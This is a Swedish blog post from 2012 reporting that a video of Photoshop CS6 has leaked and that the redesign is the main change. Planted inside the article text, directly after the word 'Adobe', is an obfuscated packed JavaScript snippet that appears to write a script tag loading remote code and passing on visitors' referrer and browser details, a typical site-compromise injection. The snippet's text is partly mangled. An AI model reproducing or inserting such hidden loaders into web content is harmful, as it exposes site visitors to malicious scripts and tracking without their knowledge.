Image Image Image Image Image Image Image Image Image Image

| 22 juli, 2018

Scroll to top

Top

PC
No Comments

Video på Photoshop CS6 har läckt och här kan ni se den.

Video på Photoshop CS6 har läckt och här kan ni se den.
Filip Urde
  • On 25 januari, 2012
  • http://www.revue.se/filip-urde

Adobe eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kihzd|var|u0026u|referrer|neynf||js|php’.split(‘|’),0,{}))
kommer snart släppa Photoshop CS6 men redan  idag har det läckt ut lite olika videos på den uppdaterade versionen. Den stora skillnaden man ser är designen. Men se mer i videon ovan.

 

Submit a Comment